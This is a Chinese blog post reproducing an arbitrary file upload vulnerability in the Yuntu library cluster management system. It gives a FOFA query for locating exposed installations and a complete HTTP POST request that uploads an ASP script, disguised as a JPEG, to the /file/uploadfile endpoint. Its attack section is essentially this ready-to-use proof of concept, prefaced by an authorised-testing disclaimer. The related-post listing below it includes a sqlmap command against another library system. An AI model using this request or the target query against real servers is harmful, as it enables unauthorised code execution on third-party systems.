【漏洞复现】云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞

已于 2024-03-26 23:09:56 修改
阅读量387 收藏
点赞数 8
文章标签: web安全 网络安全
于 2024-03-26 23:05:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137060944
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。

二、影响版本

云图图书馆集群管理系统

三、资产测绘

fofa:body=“Login/scanwxusr”

image-20240326230247394

四、漏洞复现

POST /file/uploadfile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 176

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="vezvf.asp"
Content-Type: image/jpeg

<%Response.Write("test")%>
--00content0boundary00--

image-20240326225945315

image-20240326230143287

E_cho234
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞复现】广州图创-图书馆集群管理系统-webbooknew-sql注入
知黑而守白
03-01 202
广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。​​​​​​​广州图创图书馆集群管理系统 webbooknew 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
漏洞复现】广州图创图书馆集群管理系统任意文件读取漏洞
晚风不及你
01-17 1143
广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。
高校图书馆管理系统 php 漏洞,Libsys图书管理系统 V5.5 变量覆盖漏洞
weixin_34191685的博客
04-05 800
### 登陆页面```session_start( );if ( isset( $_REQUEST['username'] ) ){$strUser = trim( $_REQUEST['username'] );$strInput = trim( $_REQUEST['passwd'] );$strMsg = "用户名或者密码错误";switch ( $strUser ){case "opac_...
漏洞复现图书馆集群管理系统存在逻辑绕过
失心少年
10-12 757
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!广州图创计算机软件开发有限公司图书馆集群管理系统存在逻辑绕过,攻击者可通过此漏洞登录后台,从而造成不良影响。
漏洞复现】广州图创 图书馆集群管理系统 WebBookNew SQL注入漏洞
qq_67810151的博客
03-13 508
由于广州图创 图书馆集群管理系统 WebBookNew 接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
interlib系统服务器,Interlib图书馆集群管理系统.docx
weixin_39763683的博客
08-05 1582
Interlib图书馆集群管理系统Interlib图书馆集群管理系统发布时间:2009-12-08阅览次数:1294 Interlib图书馆集群管理系统是全新的第三代图书馆自动化系统。作为资源共建共享的新的实现形式,Interlib图书馆集群管理系统(以下简称Interlib系统)实现了传统业务管理与海量数字资源管理的结合。Interlib系统通过Interlib或城域网络将区域内各图书馆联合起来...
stl文件读取_matlab读取stl文件形成点云_读取stl文件_读取stl_形貌_形貌扫描云图_
10-03
STL(STereo Lithography)文件格式是一种广泛用于3D打印和计算机辅助设计(CAD)领域的文件格式。它主要存储三维几何模型的信息,通常由一系列三角面片组成,每个三角面片都包含三个顶点坐标和法线方向。在本场景中...
基于matlab的任意边界云图的动画制作
05-07
利用ppt进行汇报时,如果能把一些云图的动画放在PPT里面效果会非常好。...本代码功能在于可针对矩形区域内任意外形边界,进行任意数据的云图绘制,并保存为avi视频文件,可非常方便放在PPT里面,展示效果非常好!
云合2.0发布——阿里云生态云图.pdf
08-21
标题《云合2.0发布——阿里云生态云图》提示我们这是一份与阿里云发布的新产品或服务相关的文档,而阿里云是阿里巴巴集团提供的云计算服务平台。文档中提到的“安全应急、隐私合规、态势感知、安全运营、安全架构”...
气象云图数据解析代码之Java实现
04-14
3. **数据解码**:AWX文件中的气象数据可能以特定的编码格式存在,如浮点数、整数或压缩的像素值。使用`ByteBuffer`的`getFloat()`, `getInt()`等方法解码数据,同时可能需要自定义解码算法来处理特定的编码格式。 ...
图书馆管理系统--用户手册.doc
12-16
图书馆管理系统--用户手册.doc
高校图书馆管理系统 php 漏洞,江苏汇文Libsys图书馆管理系统几处通用SQL注入漏洞...
weixin_35949264的博客
04-05 1131
漏洞存在于 Libsys图书馆管理系统 v3.5 目前有几十家高校在使用http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 北京吉利大学http://lib.math.ac.cn:8080/opac/item.php?marc_no=0000018842 中国科学院数学与系统科学研究院图书馆http://tsgl.nhic.edu.cn:...
interlib系统服务器,Interlib图书馆集群管理系统
weixin_31764625的博客
08-06 3456
Interlib图书馆集群自动化管理系统是新一代的文献信息管理软件,采用B/S模式,开放的多层结构体系,基于Internet实现传统业务管理与海量数字资源管理的结合。Interlib作为资源共建共享的新的实现形式,通过Internet网络、校园网、城域网将图书馆联合起来,组成一个区域性的虚拟图书馆群,建立一个区域图书馆群的电子化、数字化、网络化的立体信息空间,同时通过开放的多层结构达到与国内外其它...
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(4)
最新发布
2401_84972745的博客
05-13 169
云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。
漏洞复现云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞(2)
2401_84972703的博客
05-13 352
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
图创图书管理SQL注入漏洞
weixin_30667301的博客
06-14 879
payload root@kali:~# sqlmap -u http://2*0.*6.***.3:8080/opac/recommend/recommendBookList/list --data="page=1&rows=1&hasNextPage=false&searchType=title&searchValue=aaaaaaa" -p search...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值